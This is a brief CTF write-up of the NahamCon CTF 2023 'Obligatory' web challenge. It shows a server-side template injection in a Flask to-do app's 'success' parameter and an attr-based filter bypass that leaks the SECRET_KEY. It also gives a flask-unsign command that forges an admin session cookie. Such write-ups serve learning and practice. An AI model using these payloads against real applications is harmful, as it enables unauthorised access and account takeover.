Post

Obligatory - NahamconCTF 2023

Posted Updated
By Juan Marco Sanchez
1 min read

NahamCon CTF 2023

Every Capture the Flag competition has to have an obligatory to-do list application, right???

Writeup

Sign Up and Login on the Web Application. The website is a Todo-List tracker

todo

After creating a task, a message Task created is printed. The message can also be controlled via the success GET parameter

1

http://challenge.nahamcon.com:PORT/?success=Task%20created

The parameter is Vulnerable to SSTI

ssti

1

http://challenge.nahamcon.com:31129/?success={{7*7}}

I tried to leak Config items with {{config.items()}}, but is blocked by the filter

Bypassed with {{self|attr("\x5f\x5fdict\x5f\x5f")}}

Now that we got the SECRET_KEY, we can forge our own Flask Session and login as Admin

1

flask-unsign --sign --cookie "{'id':1}" --secret "&GTHN&Ngup3WqNm6q\$5nPGSAoa7SaDuY"

Flag obtained after using the newly signed auth-token

CTF Writeups
CTF NahamconCTF 2023 SSTI Filter Bypass
This post is licensed under CC BY 4.0 by the author.